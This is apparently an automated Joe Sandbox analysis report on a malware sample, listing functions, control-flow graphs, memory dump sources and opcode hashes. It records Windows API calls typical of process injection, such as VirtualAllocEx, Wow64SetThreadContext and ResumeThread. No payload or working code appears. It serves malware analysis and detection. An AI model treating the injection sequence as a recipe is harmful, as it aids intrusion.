                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 677 4f110ea-4f1113b 679 4f1114b-4f1117b Wow64SetThreadContext 677->679 680 4f1113d-4f11149 677->680 682 4f11184-4f111b4 679->682 683 4f1117d-4f11183 679->683 680->679 683->682
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04F1116E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1762816078.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f10000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: c7178394c1f5af679598a11ae8811fa98a1ff633ac6bd257116856301b477fb5
                        • Instruction ID: dc7e02c71a1326751591ae10697152b42e7174df8330df1379e94b40c9bf18eb
                        • Opcode Fuzzy Hash: c7178394c1f5af679598a11ae8811fa98a1ff633ac6bd257116856301b477fb5
                        • Instruction Fuzzy Hash: A12159B1D003098FDB10DFAAC5857EEFBF5AF48314F108429D519A7241DB789946CB54
                        Function 04F117B0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                        Download Yara Rule
                        APIs
                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 04F11830
                        Memory Dump Source
                        • Source File: 00000000.00000002.1762816078.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f10000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 4c0748362be391d0fbbc7b56e7b3c60acd4ca039b3ce93bb9d4e3d4c4eff90a6
                        • Instruction ID: 01c4ceefe5caaf5a10e8e313fa1d46b38d8387a5db7a7006b92da9aff0f12995
                        • Opcode Fuzzy Hash: 4c0748362be391d0fbbc7b56e7b3c60acd4ca039b3ce93bb9d4e3d4c4eff90a6
                        • Instruction Fuzzy Hash: F92139B1C003499FCB10DFAAC885ADEFBF5FF48320F508429E519A7251C734A955DBA5
                        Function 04F110F0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 687 4f110f0-4f1113b 689 4f1114b-4f1117b Wow64SetThreadContext 687->689 690 4f1113d-4f11149 687->690 692 4f11184-4f111b4 689->692 693 4f1117d-4f11183 689->693 690->689 693->692
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04F1116E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1762816078.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f10000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: dda82b9e5468783cd01d15a1c73a353d7268016cbb6a81db474f804dbc3b9f27
                        • Instruction ID: 8eb723d30d758a6a7f9ebb24528bd630143b406df50316ce5ba4dc0f483fcf9c
                        • Opcode Fuzzy Hash: dda82b9e5468783cd01d15a1c73a353d7268016cbb6a81db474f804dbc3b9f27
                        • Instruction Fuzzy Hash: F82137B19003098FDB10DFAAC4857EEFBF4EB88324F108429D519A7281CB78A945CBA5
                        Function 02D0D690 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                        Download Yara Rule
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02D0D717
                        Memory Dump Source
                        • Source File: 00000000.00000002.1760696200.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2d00000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: feea38b488993c24bd676fcf6b1a86de4839e246e364f283f1e447683895921e
                        • Instruction ID: 9cc8c1b025d36ca63ce8781eadf36dd04edbf1d6c3d0e396c68f30d1fa7fe634
                        • Opcode Fuzzy Hash: feea38b488993c24bd676fcf6b1a86de4839e246e364f283f1e447683895921e
                        • Instruction Fuzzy Hash: 6A21E2B59002489FDB10CFAAD984ADEFBF9EB48320F14801AE919A3351C374A954CFA5
                        Function 02D0D689 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                        Download Yara Rule
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02D0D717
                        Memory Dump Source
                        • Source File: 00000000.00000002.1760696200.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2d00000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: c72541e8eeb64f8ca31801bf52ec3f7bf7be0fda92e783ecacb77e4a4959bd08
                        • Instruction ID: 8418cfc5282ba650a4007f72e4ba090a2a4cebdfba350b5827ae0d642553e8d7
                        • Opcode Fuzzy Hash: c72541e8eeb64f8ca31801bf52ec3f7bf7be0fda92e783ecacb77e4a4959bd08
                        • Instruction Fuzzy Hash: 8821E0B59002089FDB10CFA9D984AEEBBF5EB48324F24841AE959B3351C378A955DF60
                        Function 02D0A130 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,02D0B079,00000800,00000000,00000000), ref: 02D0B28A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1760696200.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2d00000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 99c5772817419f0c2de0aa095024a0992e17b685a6a0019e9669d9aeccdfc1c6
                        • Instruction ID: d518cadf4d83695b60aa6e2ca47e90788da225515b776901888f2b0684f41b14
                        • Opcode Fuzzy Hash: 99c5772817419f0c2de0aa095024a0992e17b685a6a0019e9669d9aeccdfc1c6
                        • Instruction Fuzzy Hash: 2A1103B69043089FCB10CFAAC488BDEFBF4EB88314F10842AD519A7350C375A945CFA5
                        Function 04F115F9 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 04F1166E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1762816078.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f10000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: de26c2981ede14782a5a8104ebee6abd07d144fb07b0095e7b8c7dfdac5fbeb3
                        • Instruction ID: 3f646ebababec6bc48629bdc0633aa3f3918fd34c0927210484bbbd28c4123cb
                        • Opcode Fuzzy Hash: de26c2981ede14782a5a8104ebee6abd07d144fb07b0095e7b8c7dfdac5fbeb3
                        • Instruction Fuzzy Hash: 991156B69002098FCB10DFA9C9457DEBBF5EF88320F24841AD519A7250C735A945DBA0
                        Function 02D0B219 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,02D0B079,00000800,00000000,00000000), ref: 02D0B28A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1760696200.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2d00000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 92663b85dece7ec61e5f083d819cade69f82ee6a6b9d45d81366c329dbeb975a
                        • Instruction ID: 98e5d900eed3bd41f30fcfee3e9f3eb8d06d5f2aa9f611fb8bbeb2c60bc3b2d2
                        • Opcode Fuzzy Hash: 92663b85dece7ec61e5f083d819cade69f82ee6a6b9d45d81366c329dbeb975a
                        • Instruction Fuzzy Hash: 401112B69042498FCB10DFAAC488BDEFBF4EB89314F10842ED569A7350C375A945CFA5
                        Function 04F11600 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 04F1166E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1762816078.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f10000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 96d0e13c713375e918cd5bf1ec1cb33bc6382a0b35978a98c675616dec624813
                        • Instruction ID: 290e0fefb80a9ac2ed3dab0464eed2c08f825b54a275c2ac3916b82f763177da
                        • Opcode Fuzzy Hash: 96d0e13c713375e918cd5bf1ec1cb33bc6382a0b35978a98c675616dec624813
                        • Instruction Fuzzy Hash: 7E1153B18002088FCB10DFAAC844ADFFBF5EB88320F248419E519A7290CB35A945CBA5
                        Function 04F11038 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                        Download Yara Rule
                        APIs
                        • ResumeThread.KERNEL32(0000009C), ref: 04F110A2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1762816078.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f10000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: f747c86d4f72593fc3b66d46c99984ea8b54ea06168f027600290cf0b41c5151
                        • Instruction ID: 1433f05d994a3965c067681489afbe2fbea3c0327ab7751517ad2b1c133045f8
                        • Opcode Fuzzy Hash: f747c86d4f72593fc3b66d46c99984ea8b54ea06168f027600290cf0b41c5151
                        • Instruction Fuzzy Hash: 3F1188B1D002498FDB20DFAAC5457DEFBF5EF88324F24841AC119A7250CB39A545CB95
                        Function 04F11040 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                        Download Yara Rule
                        APIs
                        • ResumeThread.KERNEL32(0000009C), ref: 04F110A2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1762816078.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f10000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: 629f92fe2ce908b46b2d1a7118628f827e02ae1047d8107542aba5d60408494e
                        • Instruction ID: d4c799a394121e42b8a8fba726d4847d3569f15a96fa222cc1d91e908c643267
                        • Opcode Fuzzy Hash: 629f92fe2ce908b46b2d1a7118628f827e02ae1047d8107542aba5d60408494e
                        • Instruction Fuzzy Hash: AA1125B1D003488FDB20DFAAC4457DFFBF5EB88324F24841AD519A7290CA75A945CBA5
                        Function 04F14430 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                        Download Yara Rule
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 04F161E5
                        Memory Dump Source
                        • Source File: 00000000.00000002.1762816078.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f10000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: ef77960d975c870abf05519e0a5aac0dffd495bac0087966ea082d4ca2b3c583
                        • Instruction ID: 53b6ceb57773c5ff231aa251cd645e680c734b4def06304d28eb27e9a9f0f556
                        • Opcode Fuzzy Hash: ef77960d975c870abf05519e0a5aac0dffd495bac0087966ea082d4ca2b3c583
                        • Instruction Fuzzy Hash: A71122B58003499FDB10DF8AC888BDEFBF8EB48720F10841AE919A3251C375A944CFA5
                        Function 04F16180 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                        Download Yara Rule
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 04F161E5
                        Memory Dump Source
                        • Source File: 00000000.00000002.1762816078.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f10000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: 6dd3af774a2a105e6f685bce73446326a2694da026c26118636ed44250ba7a9a
                        • Instruction ID: 353d6d521ac0e08ba190bc8f715ff00056a29da13ae353753457ad9e3fbddaf7
                        • Opcode Fuzzy Hash: 6dd3af774a2a105e6f685bce73446326a2694da026c26118636ed44250ba7a9a
                        • Instruction Fuzzy Hash: 4E11F2B58002498FDB10DF99D889BDFBBF4EB48321F20841AE519A7251C375A945CFA1
                        Function 02D0AF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000), ref: 02D0AFFE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1760696200.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2d00000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 3f598152fced1dd7e332ae5192ebb35a892b29d7514c84ea00094a31dc44e1fa
                        • Instruction ID: e6f3d4d53571402b120f220e6c83a158d9a6f6acb08e226785f6e5a098a5c100
                        • Opcode Fuzzy Hash: 3f598152fced1dd7e332ae5192ebb35a892b29d7514c84ea00094a31dc44e1fa
                        • Instruction Fuzzy Hash: 7E110FB6C007498FCB20CF9AC484B9EFBF4AB88324F20841AD529A7350C375A945CFA1
                        Function 02CAD3D8 Relevance: .1, Instructions: 75COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1760419322.0000000002CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CAD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2cad000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5e69d2ba458cf8cfbdb372963a580effb1590cf6b305923635e1d106b104e6dc
                        • Instruction ID: 58d53c06380eedb6ad1ff33c3327ff9182c49fb4e247f1d86a1f86c2e23cde34
                        • Opcode Fuzzy Hash: 5e69d2ba458cf8cfbdb372963a580effb1590cf6b305923635e1d106b104e6dc
                        • Instruction Fuzzy Hash: 5F2148B1500305DFDB09DF04C9C4B16BF65FB98328F20C568E80B0B656C336E456CBA1
                        Function 02CBD01C Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1760476754.0000000002CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CBD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2cbd000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2df73c77eaaf30369f912d5b49ddbb1d9c0666b87ebc2639d0f04d19da8fa565
                        • Instruction ID: 5a8335bedf0b4a206d343e4d443e799ec2d7df6522f059e423603e80ebefb8fc
                        • Opcode Fuzzy Hash: 2df73c77eaaf30369f912d5b49ddbb1d9c0666b87ebc2639d0f04d19da8fa565
                        • Instruction Fuzzy Hash: 9321D375604200DFDB16DF14E9C4B56BBA5EF84314F24C569D80B4B246C33AD407CAA1
                        Function 02CBD1D4 Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1760476754.0000000002CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CBD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2cbd000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8a43b2ee14c96ecfc1fe5da181294576664a6446eb5bd52778ecaba36abd9c5b
                        • Instruction ID: 37a425fdbb709e6246f0136d42a1a110f9be1a8ffedbbaf91d551a2d12fe238f
                        • Opcode Fuzzy Hash: 8a43b2ee14c96ecfc1fe5da181294576664a6446eb5bd52778ecaba36abd9c5b
                        • Instruction Fuzzy Hash: BF21C575A04244EFDB06DF14D9C4B65BBA5FF84314F24C6ADE90B4B252C336D846CB62
                        Function 02CBD005 Relevance: .1, Instructions: 62COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1760476754.0000000002CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CBD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2cbd000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8e9ccd2dc47a5dba739f5979fab5f22b3b9bff039b4cdf1a9cc7fb6d71a56184
                        • Instruction ID: 4fd11827d368ea911afbed819cbc9776fb379875324549ce45f8a9536529e46b
                        • Opcode Fuzzy Hash: 8e9ccd2dc47a5dba739f5979fab5f22b3b9bff039b4cdf1a9cc7fb6d71a56184
                        • Instruction Fuzzy Hash: 572180755093808FCB03CF24D594755BF71EF86214F28C5DAD84A8B2A7C33A980ACBA2
                        Function 02CAD3D3 Relevance: .1, Instructions: 56COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1760419322.0000000002CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CAD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2cad000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                        • Instruction ID: 6831dea7b323619c9497a7d56ace0282bc371723e9873f9ac5f8a79b43e1fe4c
                        • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                        • Instruction Fuzzy Hash: 80110376504241CFDB06CF00D5C4B16BF72FB84328F24C2A9D80A0B656C33AE55ACBA1
                        Function 02CBD1CF Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1760476754.0000000002CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CBD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2cbd000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                        • Instruction ID: dc2c5f2ea5c5c3a2ddcded99723d0a84af2d926dff3f3e48504026e96013ece9
                        • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                        • Instruction Fuzzy Hash: 8E11BB75904280DFCB02CF10C5C4B15BBB2FF84224F24C6ADD84A4B296C33AD84ACB62

                        Non-executed Functions

                        Function 04F111C8 Relevance: .3, Instructions: 312COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1762816078.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f10000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7484768ba0e4a90fe771bf9632d22813d75c819b6285eb81b65685b2fd824f76
                        • Instruction ID: b5f1e1fb605268da752631b2d81bf5d9501f8066832e6d08ddeafac9412cb9c4
                        • Opcode Fuzzy Hash: 7484768ba0e4a90fe771bf9632d22813d75c819b6285eb81b65685b2fd824f76
                        • Instruction Fuzzy Hash: A9E10974E011198FCB15DFA9C6809AEFBF2FF89304F248169D515AB365D730A942CFA1
                        Function 02D0D5BC Relevance: .3, Instructions: 264COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1760696200.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2d00000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3549ce82407fcabdcf7b595eb097c14706afc42236897fca124c2a4a940acbbc
                        • Instruction ID: d8a48e295cb228675bae70e830379e90abcb1a2a1e8712cc8f0e58b385cc0b25
                        • Opcode Fuzzy Hash: 3549ce82407fcabdcf7b595eb097c14706afc42236897fca124c2a4a940acbbc
                        • Instruction Fuzzy Hash: A1A15D32E002058FCF25DFA4C8806AEB7B2FF85304B25456AE805AB3A1DF71ED15CB90
                        Function 04F111B8 Relevance: .1, Instructions: 134COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1762816078.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f10000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7923ea7bcf5a72f2d77f011e19f660ebfd2645bb7d78a76bfee497f678adac75
                        • Instruction ID: ef0e00d9964c95e2881900ca19112d91482039f316c0f4905a73957126e7f77b
                        • Opcode Fuzzy Hash: 7923ea7bcf5a72f2d77f011e19f660ebfd2645bb7d78a76bfee497f678adac75
                        • Instruction Fuzzy Hash: 33510B74E012198BDB15DFA9C6805AEFBF2BF89304F24C169D518AB316D731A942CFA1

                        Execution Graph

                        Execution Coverage:13.6%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:25
                        Total number of Limit Nodes:1
                        execution_graph 29944 6366361 29945 63662fc 29944->29945 29946 636636a 29944->29946 29950 6367400 29945->29950 29954 63673f1 29945->29954 29947 636631d 29951 6367448 29950->29951 29952 6367451 29951->29952 29958 6367148 29951->29958 29952->29947 29955 636738d 29954->29955 29956 6367390 29955->29956 29957 6367148 LoadLibraryW 29955->29957 29956->29947 29957->29956 29959 63675f0 LoadLibraryW 29958->29959 29961 6367665 29959->29961 29961->29952 29962 1060871 29963 1060889 29962->29963 29965 10608d8 29962->29965 29966 10608fa 29965->29966 29970 1060ce0 29966->29970 29974 1060ce8 29966->29974 29967 106093e 29967->29963 29971 1060ce8 GetConsoleWindow 29970->29971 29973 1060d56 29971->29973 29973->29967 29975 1060d26 GetConsoleWindow 29974->29975 29977 1060d56 29975->29977 29977->29967

                        Executed Functions

                        Function 063B1550 Relevance: 23.9, Strings: 18, Instructions: 1413COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 63b1550-63b1573 1 63b1581-63b15d7 0->1 2 63b1575-63b1577 0->2 6 63b15dd-63b160d 1->6 7 63b19a7-63b19f9 1->7 2->1 6->7 16 63b1613-63b1643 6->16 11 63b19fb-63b1a01 7->11 12 63b1a11-63b1a6c 7->12 14 63b1a03 11->14 15 63b1a05-63b1a0f 11->15 30 63b27b2-63b27f8 12->30 31 63b1a72-63b1a87 12->31 14->12 15->12 16->7 23 63b1649-63b1679 16->23 23->7 28 63b167f-63b16af 23->28 28->7 39 63b16b5-63b16e5 28->39 36 63b27fa-63b2800 30->36 37 63b2810-63b2888 30->37 31->30 38 63b1a8d-63b1abe 31->38 40 63b2802 36->40 41 63b2804-63b280e 36->41 64 63b288a-63b28b0 37->64 65 63b28b2-63b28b9 37->65 49 63b1ad8-63b1b24 38->49 50 63b1ac0-63b1ad6 38->50 39->7 51 63b16eb-63b171b 39->51 40->37 41->37 62 63b1b2b-63b1b48 49->62 50->62 51->7 60 63b1721-63b1751 51->60 60->7 73 63b1757-63b1787 60->73 62->30 70 63b1b4e-63b1b80 62->70 64->65 77 63b1b9a-63b1be6 70->77 78 63b1b82-63b1b98 70->78 73->7 82 63b178d-63b17bd 73->82 86 63b1bed-63b1c0a 77->86 78->86 82->7 89 63b17c3-63b17da 82->89 86->30 91 63b1c10-63b1c42 86->91 89->7 94 63b17e0-63b180c 89->94 98 63b1c5c-63b1ca8 91->98 99 63b1c44-63b1c5a 91->99 101 63b180e-63b1834 94->101 102 63b1836-63b1878 94->102 109 63b1caf-63b1ccc 98->109 99->109 118 63b18a8-63b18d5 101->118 122 63b187a-63b1890 102->122 123 63b1896-63b18a2 102->123 109->30 117 63b1cd2-63b1d04 109->117 126 63b1d1e-63b1d6a 117->126 127 63b1d06-63b1d1c 117->127 118->7 128 63b18db-63b190f 118->128 122->123 123->118 134 63b1d71-63b1d8e 126->134 127->134 128->7 137 63b1915-63b1958 128->137 134->30 139 63b1d94-63b1dc6 134->139 137->7 149 63b195a-63b198a 137->149 146 63b1dc8-63b1dde 139->146 147 63b1de0-63b1e38 139->147 155 63b1e3f-63b1e5c 146->155 147->155 149->7 159 63b198c-63b19a4 149->159 155->30 161 63b1e62-63b1e94 155->161 165 63b1eae-63b1f0c 161->165 166 63b1e96-63b1eac 161->166 171 63b1f13-63b1f30 165->171 166->171 171->30 175 63b1f36-63b1f68 171->175 178 63b1f6a-63b1f80 175->178 179 63b1f82-63b1fe0 175->179 184 63b1fe7-63b2004 178->184 179->184 184->30 188 63b200a-63b203c 184->188 191 63b203e-63b2054 188->191 192 63b2056-63b20b4 188->192 197 63b20bb-63b20d8 191->197 192->197 197->30 201 63b20de-63b2110 197->201 204 63b212a-63b2188 201->204 205 63b2112-63b2128 201->205 210 63b218f-63b21ac 204->210 205->210 210->30 213 63b21b2-63b21c7 210->213 213->30 216 63b21cd-63b21fe 213->216 219 63b2218-63b2276 216->219 220 63b2200-63b2216 216->220 225 63b227d-63b229a 219->225 220->225 225->30 229 63b22a0-63b22d2 225->229 232 63b22ec-63b234a 229->232 233 63b22d4-63b22ea 229->233 238 63b2351-63b236e 232->238 233->238 238->30 242 63b2374-63b23a6 238->242 245 63b23a8-63b23be 242->245 246 63b23c0-63b241e 242->246 251 63b2425-63b2442 245->251 246->251 251->30 255 63b2448-63b247a 251->255 258 63b247c-63b2492 255->258 259 63b2494-63b24f2 255->259 264 63b24f9-63b2516 258->264 259->264 264->30 267 63b251c-63b2531 264->267 267->30 270 63b2537-63b2568 267->270 273 63b256a-63b2580 270->273 274 63b2582-63b25e0 270->274 279 63b25e7-63b2604 273->279 274->279 279->30 283 63b260a-63b261f 279->283 283->30 285 63b2625-63b2656 283->285 288 63b2658-63b266e 285->288 289 63b2670-63b26ce 285->289 294 63b26d5-63b26f2 288->294 289->294 294->30 298 63b26f8-63b2724 294->298 301 63b273e-63b2793 298->301 302 63b2726-63b273c 298->302 307 63b279a-63b27af 301->307 302->307
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.1890939572.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_63b0000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID:
                        • String ID: $]$(Z$<]$@Z$D[$D[$D[$D[$D[$L\$T]$XZ$d\$l]$pZ$|\$Y$Z
                        • API String ID: 0-3530822873
                        • Opcode ID: 5263c6fde7f4db3c22bdaf43659e8167ef80d97f418acd362f4e80348e7adfa2
                        • Instruction ID: f40bb6b2a38f9b3a60a35ce09627adff3a16d92dd902b1b14fba93cdbe00b615
                        • Opcode Fuzzy Hash: 5263c6fde7f4db3c22bdaf43659e8167ef80d97f418acd362f4e80348e7adfa2
                        • Instruction Fuzzy Hash: F3C23074B006189FCB14DB54C891EEEBBB6FF88700F508095E609AB7A1DB71AD85CF91
                        Function 063B056A Relevance: 4.2, Strings: 3, Instructions: 465COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
